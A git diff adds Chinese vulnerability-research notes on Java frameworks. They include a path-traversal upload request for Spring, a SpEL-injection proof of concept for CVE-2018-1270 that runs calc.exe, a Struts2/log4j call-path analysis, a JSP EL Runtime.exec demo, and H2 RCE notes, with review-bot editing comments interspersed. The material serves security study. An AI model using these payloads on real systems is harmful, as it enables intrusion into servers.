@@ -0,0 +1,95 @@ +##### v2.7.2 + +###### 缺省设置 - StandardMultipartFile - 可路径穿越 + +- spring-autoconfigure-metadata.properties + +![](img/Pasted%20image%2020220818202936.png) +- org.springframework.web.servlet.DispatcherServlet#checkMultipart + +![](img/Pasted%20image%2020220818202952.png) + +- org.springframework.web.multipart.support.StandardMultipartHttpServletRequest.StandardMultipartFile#getOriginalFilename + +```java +public String getOriginalFilename() { + return this.filename; +} +``` + +没有对文件名进行处理,可以使用 `../` 进行路径穿越 + +![](img/Pasted%20image%2020220818203007.png) + +![](img/Pasted%20image%2020220818203017.png) + +###### 自定义设置 - CommonsMultipartResolver - 不可路径穿越 + +需要引入 `commons-fileupload` 依赖 + +```xml + + commons-fileupload + commons-fileupload + 1.4 + +``` + +- org.springframework.web.multipart.commons.CommonsMultipartFile#getOriginalFilename + +```java +public String getOriginalFilename() { + String filename = this.fileItem.getName(); + if (filename == null) { + return ""; + } else if (this.preserveFilename) { + return filename; + } else { + // 出现 Linux 下分隔符的最后一个位置 `\` + int unixSep = filename.lastIndexOf(47); + // 出现 Windows 下分隔符的最后一个位置 `/` + int winSep = filename.lastIndexOf(92); + // 比较 Lin 分隔符 和 Win 分隔符的位置,选择最靠后的位置 + int pos = Math.max(winSep, unixSep); + // 截取最靠后的分隔符的位置进行截取 + // ../../\\/./filename -> filename + return pos != -1 ? 
filename.substring(pos + 1) : filename; + } +} +``` + +![](img/Pasted%20image%2020220818183404.png) + +##### <= v1.2.7.RELEASE + +###### 自定义设置 - CommonsMultipartResolver - 可路径穿越 + +> 内嵌 spring-web-4.1.8,而 Windows 下的路径穿越问题在 4.1.9 才修复。 + +- org.springframework.web.multipart.commons.CommonsMultipartFile#getOriginalFilename + +```java +public String getOriginalFilename() { + String filename = this.fileItem.getName(); + if (filename == null) { + return ""; + } else { + int pos = filename.lastIndexOf("/"); + /** + * filename = ../..\\flag.txt + * pos == 2 != -1 + * filename = filename.substring(pos + 1) = + * */ + + if (pos == -1) { + pos = filename.lastIndexOf("\\"); + } + + return pos != -1 ? filename.substring(pos + 1) : filename; + } +} +``` + +已在 v4.0.9 修复 + +![](img/Pasted%20image%2020220818203038.png) diff --git a/framework/web/spring boot/img/Pasted image 20220818202936.png b/framework/web/spring boot/img/Pasted image 20220818202936.png new file mode 100644 index 00000000..d8301927 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818202936.png differ diff --git a/framework/web/spring boot/img/Pasted image 20220818202952.png b/framework/web/spring boot/img/Pasted image 20220818202952.png new file mode 100644 index 00000000..90b83ae0 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818202952.png differ diff --git a/framework/web/spring boot/img/Pasted image 20220818203007.png b/framework/web/spring boot/img/Pasted image 20220818203007.png new file mode 100644 index 00000000..e66ff662 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818203007.png differ diff --git a/framework/web/spring boot/img/Pasted image 20220818203017.png b/framework/web/spring boot/img/Pasted image 20220818203017.png new file mode 100644 index 00000000..069e52a2 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818203017.png differ 
diff --git a/framework/web/spring boot/img/Pasted image 20220818203038.png b/framework/web/spring boot/img/Pasted image 20220818203038.png new file mode 100644 index 00000000..e6512f58 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818203038.png differ diff --git a/framework/web/spring webflux/README.md b/framework/web/spring webflux/README.md new file mode 100644 index 00000000..a1e1cc2a --- /dev/null +++ b/framework/web/spring webflux/README.md @@ -0,0 +1,23 @@ +前置基础 +--- + +**应用简介** + +WebFlux 是一个 Spring 响应式 Web 框架。它已添加到 Spring 5 中。它是完全非阻塞的,支持 reactive streams 响应流,并且可以很好运行在 Netty,Undertow 和 Servlet 3.1 + 容器等服务器上, 是传统 Spring MVC 的一个替代方案。 +Spring WebFlux 在内部使用 Project Reactor 和它的 Publisher 实现 Flux 和 Mono。它支持两种编程模型:a)基于注释的响应式组件,b)函数级别的路由和处理。 + + + + +相关漏洞 +--- + + +研究利用 +--- + +### 回显 + + +### 内存马 + diff --git "a/framework/web/spring/spring framework/CommonsMultipartFile.getOriginalFilename 347円273円225円350円277円207円.md" "b/framework/web/spring/spring framework/CommonsMultipartFile.getOriginalFilename 347円273円225円350円277円207円.md" new file mode 100644 index 00000000..11059c39 --- /dev/null +++ "b/framework/web/spring/spring framework/CommonsMultipartFile.getOriginalFilename 347円273円225円350円277円207円.md" 
@@ -0,0 +1,37 @@ +前置条件 + +- spring-web <= 4.1.8.RELEASE 对应 spingboot <= v1.2.7.RELEASE +- Windows + + +``` +\org\springframework\spring-web4円.0.8.RELEASE\spring-web-4.1.8.RELEASE.jar!\org\springframework\web\multipart\commons\CommonsMultipartFile.class +``` + +```http +POST /upload HTTP/1.1 +Host: localhost:9090 +Content-Type: multipart/form-data; boundary=2022 +Content-Length: 114 + +--2022 +Content-Disposition: form-data; name="file"; filename="../..\\..\\..\\flag.txt" + +hello world +--2022-- +``` + +- org.springframework.web.multipart.commons.CommonsMultipartFile#getOriginalFilename + +![](img/Pasted%20image%2020220818204052.png) + +- `filename="../..\\..\\..\\flag.txt"` or `filename="../..\..\..\flag.txt"` +- pos = 2 且 != -1 ,所以不会对 `\` 进行处理 +- 而Windows是支持 `..\` 和 `..\\`的 + - ![](img/Pasted%20image%2020220818204102.png) +- 从而可以进行路径穿越 + + +修复: + +![](img/Pasted%20image%2020220818204110.png) diff --git a/framework/web/spring/spring framework/README.md b/framework/web/spring/spring framework/README.md new file mode 100644 index 00000000..f81fa7d6 --- /dev/null +++ b/framework/web/spring/spring framework/README.md @@ -0,0 +1,24 @@ +前置基础 +--- + + + +相关漏洞 +--- + +### Spring CVE-2010-1622 RCE + +- [SpringMVC框架任意代码执行漏洞(CVE-2010-1622)分析](http://rui0.cn/archives/1158) + +### Spring 2022-03-29 RCE +> 占坑 + +- 用jdk9的特性绕过,然后结合某机制写入文件 + +![image](https://user-images.githubusercontent.com/55024146/160760457-76e430f2-e21e-4e08-92f3-6b82402d4029.png) + + +利用研究 +--- + +- Spring Boot Fat Jar + 任意文件写入 diff --git a/framework/web/spring/spring framework/img/Pasted image 20220818204052.png b/framework/web/spring/spring framework/img/Pasted image 20220818204052.png new file mode 100644 index 00000000..59f7c672 Binary files /dev/null and b/framework/web/spring/spring framework/img/Pasted image 20220818204052.png differ 
diff --git a/framework/web/spring/spring framework/img/Pasted image 20220818204102.png b/framework/web/spring/spring framework/img/Pasted image 20220818204102.png new file mode 100644 index 00000000..d246fe68 Binary files /dev/null and b/framework/web/spring/spring framework/img/Pasted image 20220818204102.png differ diff --git a/framework/web/spring/spring framework/img/Pasted image 20220818204110.png b/framework/web/spring/spring framework/img/Pasted image 20220818204110.png new file mode 100644 index 00000000..e6512f58 Binary files /dev/null and b/framework/web/spring/spring framework/img/Pasted image 20220818204110.png differ diff --git a/framework/web/spring/spring messaging/README.md b/framework/web/spring/spring messaging/README.md new file mode 100644 index 00000000..d7350bde --- /dev/null +++ b/framework/web/spring/spring messaging/README.md 
@@ -0,0 +1,107 @@ +前置基础 +--- + + +相关漏洞 +--- + +### CVE-2018-1270 SpEL Injection RCE + +#### 环境搭建 + +``` +git clone git@github.com:spring-guides/gs-messaging-stomp-websocket.git +cd gs-messaging-stomp-websocket +git checkout 6958af0b02bf05282673826b73cd7a85e84c12d3 +cd complete +mvn spring-boot:run +``` + +![image-20211116215130852](vulnerability-research.assets/image-20211116215130852.png) + +#### 漏洞复现 + +篡改app.js的内容,插入恶意selector代码: + +```js +function connect() { + var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"}; + var socket = new SockJS('/gs-guide-websocket'); + stompClient = Stomp.over(socket); + stompClient.connect({}, function (frame) { + setConnected(true); + console.log('Connected: ' + frame); + stompClient.subscribe('/topic/greetings', function (greeting) { + showGreeting(JSON.parse(greeting.body).content); + },header); + }); +} +``` + +![image-20211116215228659](vulnerability-research.assets/image-20211116215228659.png) + +然后保存 Ctrl + S,然后点击Connect再随便Send一些字符,成功触发漏洞 + +![image-20211116215431393](vulnerability-research.assets/image-20211116215431393.png) + +#### 漏洞分析 + +sink处下断点 + +![image](https://user-images.githubusercontent.com/55024146/161274708-3707482e-3f07-47c2-8a1b-7c638bd826cb.png) + +获取调用栈 +```java +getRuntime:58, Runtime (java.lang) +invoke0:-1, NativeMethodAccessorImpl (sun.reflect) +invoke:62, NativeMethodAccessorImpl (sun.reflect) +invoke:43, DelegatingMethodAccessorImpl (sun.reflect) +invoke:498, Method (java.lang.reflect) +execute:120, ReflectiveMethodExecutor (org.springframework.expression.spel.support) +getValueInternal:107, MethodReference (org.springframework.expression.spel.ast) +getValueInternal:90, MethodReference (org.springframework.expression.spel.ast) +getValueRef:58, CompoundExpression (org.springframework.expression.spel.ast) +getValueInternal:88, CompoundExpression (org.springframework.expression.spel.ast) +getTypedValue:116, SpelNodeImpl (org.springframework.expression.spel.ast) +getValue:306, 
SpelExpression (org.springframework.expression.spel.standard) +filterSubscriptions:217, DefaultSubscriptionRegistry (org.springframework.messaging.simp.broker) +findSubscriptionsInternal:186, DefaultSubscriptionRegistry (org.springframework.messaging.simp.broker) +findSubscriptions:127, AbstractSubscriptionRegistry (org.springframework.messaging.simp.broker) +sendMessageToSubscribers:350, SimpleBrokerMessageHandler (org.springframework.messaging.simp.broker) +handleMessageInternal:272, SimpleBrokerMessageHandler (org.springframework.messaging.simp.broker) +handleMessage:241, AbstractBrokerMessageHandler (org.springframework.messaging.simp.broker) +run:138, ExecutorSubscribableChannel$SendTask (org.springframework.messaging.support) +sendInternal:94, ExecutorSubscribableChannel (org.springframework.messaging.support) +send:119, AbstractMessageChannel (org.springframework.messaging.support) +send:105, AbstractMessageChannel (org.springframework.messaging.support) +sendInternal:187, SimpMessagingTemplate (org.springframework.messaging.simp) +doSend:162, SimpMessagingTemplate (org.springframework.messaging.simp) +doSend:48, SimpMessagingTemplate (org.springframework.messaging.simp) +send:108, AbstractMessageSendingTemplate (org.springframework.messaging.core) +convertAndSend:150, AbstractMessageSendingTemplate (org.springframework.messaging.core) +convertAndSend:128, AbstractMessageSendingTemplate (org.springframework.messaging.core) +handleReturnValue:188, SendToMethodReturnValueHandler (org.springframework.messaging.simp.annotation.support) +handleReturnValue:107, HandlerMethodReturnValueHandlerComposite (org.springframework.messaging.handler.invocation) +handleMatch:527, AbstractMethodMessageHandler (org.springframework.messaging.handler.invocation) +handleMatch:497, SimpAnnotationMethodMessageHandler (org.springframework.messaging.simp.annotation.support) +handleMatch:88, SimpAnnotationMethodMessageHandler (org.springframework.messaging.simp.annotation.support) 
+handleMessageInternal:473, AbstractMethodMessageHandler (org.springframework.messaging.handler.invocation) +handleMessage:409, AbstractMethodMessageHandler (org.springframework.messaging.handler.invocation) +run:138, ExecutorSubscribableChannel$SendTask (org.springframework.messaging.support) +runWorker:1142, ThreadPoolExecutor (java.util.concurrent) +run:617, ThreadPoolExecutor$Worker (java.util.concurrent) +run:745, Thread (java.lang) +``` +回溯找到漏洞代码所在位置 + +![image](https://user-images.githubusercontent.com/55024146/161275489-36c39c81-c66d-43df-8c1b-d02598fe27ea.png) + +建立连接时会将payload通过add方法添加到subs中,此时并没有触发。 + +![image](https://user-images.githubusercontent.com/55024146/161279463-74534fc6-57be-4990-aa86-e6413bf5bd8d.png) + +然后在建立连接后,发送任意内容的消息,在filterSubscriptions方法中获取连接配置(spel injection payload),然后调用expression.getValue(),触发rce。 + +![image](https://user-images.githubusercontent.com/55024146/161277764-376c9ddc-dd7c-41f0-a6f1-fbb6a61859db.png) + + diff --git a/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215130852.png b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215130852.png new file mode 100644 index 00000000..efe5ecd4 Binary files /dev/null and b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215130852.png differ diff --git a/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215228659.png b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215228659.png new file mode 100644 index 00000000..3fd541c4 Binary files /dev/null and b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215228659.png differ 
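Review bot: the pinned checkout in the 环境搭建 block of framework/web/spring/spring messaging/README.md (6958af0b…) is never tied to a Spring Framework version, so the hunk does not say which spring-messaging versions CVE-2018-1270 affects or where it was fixed; add the affected and fixed version range beside the checkout so a reader knows why that revision is vulnerable and can check their own dependency tree. Two smaller points: `git clone git@github.com:spring-guides/gs-messaging-stomp-websocket.git` needs an SSH key, so an https clone URL is the better default for a reproduction guide, and the stack dump under 获取调用栈 is fenced as java although it is IDEA debugger output, which mislabels it for highlighting. The trace does support the prose as written: the selector is only stored by `add` on subscribe and is evaluated in `filterSubscriptions:217, DefaultSubscriptionRegistry` when a message is routed, which is why the payload fires on Send rather than on Connect.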
diff --git a/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215431393.png b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215431393.png new file mode 100644 index 00000000..de553d4b Binary files /dev/null and b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215431393.png differ diff --git a/framework/web/struts2/CVE-2021-44228.md b/framework/web/struts2/CVE-2021-44228.md new file mode 100644 index 00000000..abc0df33 --- /dev/null +++ b/framework/web/struts2/CVE-2021-44228.md 
@@ -0,0 +1,102 @@ +## Apache Struts2 RCE via Log4j2 CVE-2021-44228 + +### 环境搭建 +首先搭建环境 +- 下载源码:https://dlcdn.apache.org/struts/2.5.27/struts-2.5.27-all.zip,解压 +- 复制struts-2.5.27\src\apps\showcase文件夹到自己的测试目录,右键用IDEA打开 +- 配置tomcat,启动即可 + +![image](img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png) + +注:确认是否使用log4j2组件 + +![image](img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png) + + +### 漏洞分析 + +根据流传的payload中携带的HTTP头字段`If-Modified-Since`找到对应的源码位置,下断点 + +![image](img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png) + +- org.apache.struts2.dispatcher.DefaultStaticContentLoader#process + +![image](img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png) + + +![image](img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png) + +整个调用栈 +> ```java +> warn:2774, AbstractLogger (org.apache.logging.log4j.spi) +> process:241, DefaultStaticContentLoader (org.apache.struts2.dispatcher) +> findStaticResource:215, DefaultStaticContentLoader (org.apache.struts2.dispatcher) +> executeStaticResourceRequest:59, ExecuteOperations (org.apache.struts2.dispatcher) +> doFilter:81, StrutsExecuteFilter (org.apache.struts2.dispatcher.filter) +> internalDoFilter:193, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:166, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:65, SiteMeshFilter (com.opensymphony.sitemesh.webapp) +> internalDoFilter:193, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:166, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:92, StrutsPrepareFilter (org.apache.struts2.dispatcher.filter) +> internalDoFilter:193, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:166, ApplicationFilterChain (org.apache.catalina.core) +> invoke:196, StandardWrapperValve (org.apache.catalina.core) +> invoke:97, StandardContextValve (org.apache.catalina.core) +> invoke:544, AuthenticatorBase (org.apache.catalina.authenticator) +> invoke:135, StandardHostValve (org.apache.catalina.core) +> invoke:81, ErrorReportValve 
(org.apache.catalina.valves) +> invoke:698, AbstractAccessLogValve (org.apache.catalina.valves) +> invoke:78, StandardEngineValve (org.apache.catalina.core) +> service:364, CoyoteAdapter (org.apache.catalina.connector) +> service:624, Http11Processor (org.apache.coyote.http11) +> process:65, AbstractProcessorLight (org.apache.coyote) +> process:831, AbstractProtocol$ConnectionHandler (org.apache.coyote) +> doRun:1650, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net) +> run:49, SocketProcessorBase (org.apache.tomcat.util.net) +> runWorker:1191, ThreadPoolExecutor (org.apache.tomcat.util.threads) +> run:659, ThreadPoolExecutor$Worker (org.apache.tomcat.util.threads) +> run:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads) +> run:745, Thread (java.lang) +> ``` + +根据调用栈中的调用情况,分析为什么请求会执行到这里 +- ALT + F7 + +![image](img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png) + +![image](img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png) + +![image](img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png) + +![image](img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png) + +捋一捋其请求的执行流程 +- 1、请求A 首先被StrutsExecuteFilter进行处理 + - execute.executeStaticResourceRequest `处理对静态资源的请求` + ![image](img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png) + +- 2、需要满足条件(请求的静态资源路径以"/struts"或"/static"开头) + - ![image](img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png) + +- 3、条件满足后,执行到org.apache.struts2.dispatcher.DefaultStaticContentLoader#findStaticResource + - 需要满足条件:请求的静态资源需要存在,否则直接返回404 + - 可以通过右键查看源码查找需要的路径 + ![image](img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png) + +- 4、条件满足后,执行到org.apache.struts2.dispatcher.DefaultStaticContentLoader#process + - 构造恶意的If-Modified-Since即可触发log4j2的RCE + ![image](img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png) + + +至此,分析完毕。 + +### 漏洞复现 + + +![image](img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png) + + +参考: + +https://twitter.com/payloadartist/status/1469987703429103622 
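Review bot: the 漏洞分析 section of framework/web/struts2/CVE-2021-44228.md never records which log4j-core version the 2.5.27 showcase ships, although the step 注:确认是否使用log4j2组件 exists for exactly that purpose and shows it only in a screenshot; write the version into the text, together with the remediation (upgrade log4j-core), so the analysis is reproducible without the image. Also: the full call stack is a debugger dump inside a quoted java fence, a plain fence with no language tag is the right marking; the step list under 捋一捋其请求的执行流程 writes `- 1、请求A 首先被StrutsExecuteFilter进行处理`, a bullet that contains a number, so it renders as an unordered list with stray numerals rather than an ordered list (drop either the dash or the 1、); and the closing 参考: entry is a bare Twitter URL with no description of what it contains, which becomes meaningless once the tweet is gone.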
diff --git a/framework/web/struts2/img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png b/framework/web/struts2/img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png new file mode 100644 index 00000000..57dbc521 Binary files /dev/null and b/framework/web/struts2/img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png differ diff --git a/framework/web/struts2/img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png b/framework/web/struts2/img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png new file mode 100644 index 00000000..0db0b6bb Binary files /dev/null and b/framework/web/struts2/img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png differ diff --git a/framework/web/struts2/img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png b/framework/web/struts2/img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png new file mode 100644 index 00000000..2e100b4d Binary files /dev/null and b/framework/web/struts2/img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png differ diff --git a/framework/web/struts2/img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png b/framework/web/struts2/img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png new file mode 100644 index 00000000..77624e66 Binary files /dev/null and b/framework/web/struts2/img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png differ diff --git a/framework/web/struts2/img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png b/framework/web/struts2/img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png new file mode 100644 index 00000000..8c9973ee Binary files /dev/null and b/framework/web/struts2/img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png differ diff --git a/framework/web/struts2/img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png b/framework/web/struts2/img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png new file mode 100644 index 00000000..f666af31 Binary files /dev/null and b/framework/web/struts2/img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png differ 
diff --git a/framework/web/struts2/img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png b/framework/web/struts2/img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png new file mode 100644 index 00000000..334796ad Binary files /dev/null and b/framework/web/struts2/img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png differ diff --git a/framework/web/struts2/img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png b/framework/web/struts2/img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png new file mode 100644 index 00000000..3dbfbe8b Binary files /dev/null and b/framework/web/struts2/img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png differ diff --git a/framework/web/struts2/img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png b/framework/web/struts2/img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png new file mode 100644 index 00000000..f609d59a Binary files /dev/null and b/framework/web/struts2/img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png differ diff --git a/framework/web/struts2/img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png b/framework/web/struts2/img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png new file mode 100644 index 00000000..3f2fd2d0 Binary files /dev/null and b/framework/web/struts2/img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png differ diff --git a/framework/web/struts2/img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png b/framework/web/struts2/img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png new file mode 100644 index 00000000..1176bd0d Binary files /dev/null and b/framework/web/struts2/img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png differ diff --git a/framework/web/struts2/img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png b/framework/web/struts2/img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png new file mode 100644 index 00000000..0968af15 Binary files /dev/null and b/framework/web/struts2/img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png differ 
diff --git a/framework/web/struts2/img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png b/framework/web/struts2/img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png new file mode 100644 index 00000000..968bada3 Binary files /dev/null and b/framework/web/struts2/img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png differ diff --git a/framework/web/struts2/img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png b/framework/web/struts2/img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png new file mode 100644 index 00000000..93b9ed6c Binary files /dev/null and b/framework/web/struts2/img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png differ diff --git a/javaee/base64/README.md b/javaee/base64/README.md new file mode 100644 index 00000000..e818d5c1 --- /dev/null +++ b/javaee/base64/README.md @@ -0,0 +1,6 @@ +attack scenario +``` +Shiro 利用 Base64 解码差异绕 WAF +``` + +- [Java下奇怪的Base64](http://www.lmxspace.com/2021/01/06/Java%E4%B8%8B%E5%A5%87%E6%80%AA%E7%9A%84Base64/) diff --git a/javaee/bcel/README.md b/javaee/bcel/README.md new file mode 100644 index 00000000..21300501 --- /dev/null +++ b/javaee/bcel/README.md @@ -0,0 +1,21 @@ +前置基础 +--- + + +相关利用 +--- + +### BCEL 编码/解码工具 X-BCELCode.jar + +- BCEL编码/解码,常用于构造反序列化漏洞payload的场景 +``` +# java version "1.8.0_201" +java -jar .\X-BCELCode.jar +``` +![X-BCELCode-1](https://user-images.githubusercontent.com/55024146/159114851-0cad5313-adec-496e-8fdf-17be1ce7b198.png) + +``` +java -jar .\X-BCELCode.jar --encode .\src\Evil.class +java -jar .\X-BCELCode.jar --decode '$$BCEL$$$l8ドルb$I$A$A$A$' +``` +![X-BCELCode-2](https://user-images.githubusercontent.com/55024146/159114854-d162a6a0-e599-42dc-8f14-4e300495bbbe.png) diff --git a/javaee/bcel/X-BCEL.jar b/javaee/bcel/X-BCEL.jar new file mode 100644 index 00000000..063f1d37 Binary files /dev/null and b/javaee/bcel/X-BCEL.jar differ diff --git a/javaee/design pattern/README.md b/javaee/design pattern/README.md new file mode 100644 index 00000000..4ab39574 --- /dev/null 
+++ b/javaee/design pattern/README.md @@ -0,0 +1,7 @@ +> 记录代码阅读过程中遇到过的设计模式 + +#### 1、访问者模式(Visitor Pattern) + +``` +访问比较复杂的数据结构,不去改变数据结构,而是把对数据的操作抽象出来,在"访问"的过程中以回调形式在访问者中处理操作逻辑。 +``` diff --git a/javaee/expression language/ognl/README.md b/javaee/expression language/ognl/README.md new file mode 100644 index 00000000..f46b767e --- /dev/null +++ b/javaee/expression language/ognl/README.md @@ -0,0 +1 @@ +- [0x02 表达式语言 OGNL](https://pen4uin.github.io/post/22-10-03-confluence-el-injection-via-ognl/#0x02-%E8%A1%A8%E8%BE%BE%E5%BC%8F%E8%AF%AD%E8%A8%80-ognl) diff --git a/javaee/expression language/spel/README.md b/javaee/expression language/spel/README.md new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/javaee/expression language/spel/README.md @@ -0,0 +1 @@ + diff --git a/javaee/java servlet/README.md b/javaee/java servlet/README.md new file mode 100644 index 00000000..fafbc713 --- /dev/null +++ b/javaee/java servlet/README.md @@ -0,0 +1,5 @@ +> attack vector + +- 权限绕过: getRequestURI() + getServletPath() +- 权限绕过: RequestDispatcher methods +- 条件竞争 diff --git a/javaee/jdbc/h2/README.md b/javaee/jdbc/h2/README.md new file mode 100644 index 00000000..786464c0 --- /dev/null +++ b/javaee/jdbc/h2/README.md @@ -0,0 +1,6 @@ +> RCE + +- JNDI +- RUNSCRIPT + evil.sql (本质: CREATE ALIAS AS) +- CREATE ALIAS AS +- CREATE TRIGGER diff --git a/javaee/jdbc/mysql/README.md b/javaee/jdbc/mysql/README.md new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/javaee/jdbc/mysql/README.md @@ -0,0 +1 @@ + diff --git a/javaee/jdbc/postgresql/README.md b/javaee/jdbc/postgresql/README.md new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/javaee/jdbc/postgresql/README.md @@ -0,0 +1 @@ + diff --git a/javaee/jsp/README.md b/javaee/jsp/README.md new file mode 100644 index 00000000..f781046b --- /dev/null +++ b/javaee/jsp/README.md 
@@ -0,0 +1,148 @@ +前置基础 +--- + +### 内置对象 +``` +1、request:表示一次请求,HttpServletRequest +2、response:表示一次响应,HttpServletResponse +3、pageContext:⻚面上下文,获取⻚面信息,PageContext +4、session:表示一次会话,保存用户信息,HttpSession +5、application:表示当前 Web 应用,全局对象,保存所有用户共享信息,ServletContext +6、config:当前 JSP 对应的 Servlet 的 ServletConfig 对象,获取当前 Servlet 的信息 +7、out:向浏览器输出数据,JspWriter +8、page:当前 JSP 对应的 Servlet 对象,Servlet +9、exception:表示 JSP ⻚面发生的异常,Exception +``` + +### response.getRequestDispatcher 和 response.sendRedirect 的区别 +``` +getRequestDispatcher 是将同一个请求传给下一个⻚面 +sendRedirect 是创建一个新的请求传给下一个⻚面,之前的请求结束生命周期 +``` + + +### JSP EL +**简介** + +Expression Language 简称EL,是Java中的一种特殊的通用编程语言,借鉴于JavaScript和XPath。主要作用是在Java Web应用程序嵌入到网页(如JSP)中,用以访问页面的上下文以及不同作用域中的对象 ,取得对象属性的值,或执行简单的运算或判断操作。 +EL获取到某个数据时,会自动进行数据类型的转换。 + +**pom.xml** +> Tomcat 默认携带el-api.jar +```xml + + javax.el + javax.el-api + 2.2.4 + provided + +``` +**常用语法** +``` +${EL表达式} +``` +获取pageContext对象 +```java +${pageContext} +``` +![image](https://user-images.githubusercontent.com/55024146/159130650-1d803e4d-1fec-474b-89fd-39a1f68f0e17.png) + +**EL表达式调用java方法** + +1)新建类并定义静态方法 + +至于为什么得是静态方法? 
+ +![image](https://user-images.githubusercontent.com/55024146/159131463-0f8965ba-3d37-4ec3-8713-a757f56ee415.png) + + +```java +package com.lab; + +import java.io.IOException; + +public class ELTest { + public static String Exec(String cmd) throws IOException { + return Runtime.getRuntime().exec(cmd).toString(); + } +} + +``` +2)在WEB-INF文件夹下(除lib和classess目录外)新建tld文件 +```xml + + + 1.0 + ELTest + http://10.10.10.1:8080/ELTest + + Exec + com.lab.ELTest + java.lang.String Exec(java.lang.String) + + +``` +3)jsp头部导入 +```jsp +<%@ taglib prefix="ELTest" uri="http://10.10.10.1:8080/ELTest" %> +``` +4)el标签使用 +```jsp +${ELTest:Exec("calc")} +``` + +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/159131518-e5d5324e-b6cb-4c94-b1c7-1794f3cd49a8.png) + +### JSTL +**简介** + +JSP Standard Tag Library JSP 标准标签库,JSP 为开发者提供的一系列的标签,使用这些标签可以完成 +一些逻辑处理,比如循环遍历集合,让代码更加简洁,不再出现 JSP 脚本穿插的情况。 +实际开发中 EL 和 JSTL 结合起来使用,JSTL 侧重于逻辑处理,EL 负责展示数据。 + + +导入 JSTL 标签库 +``` +<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%> +``` + + +**安全问题-SSRF漏洞** + +标签提供了所有行为标签所具有的功能,同时也允许包含绝对URL。 + +实际案例 +- [蓝凌OA前台SSRF+dataxml.jsp RCE漏洞](https://422926799.github.io/posts/980cff8b.html) + +![image](https://user-images.githubusercontent.com/55024146/159132587-8ded391a-604e-43a2-87c9-d5696b506df8.png) + + +利用研究 +--- + +### JSP + EL构造 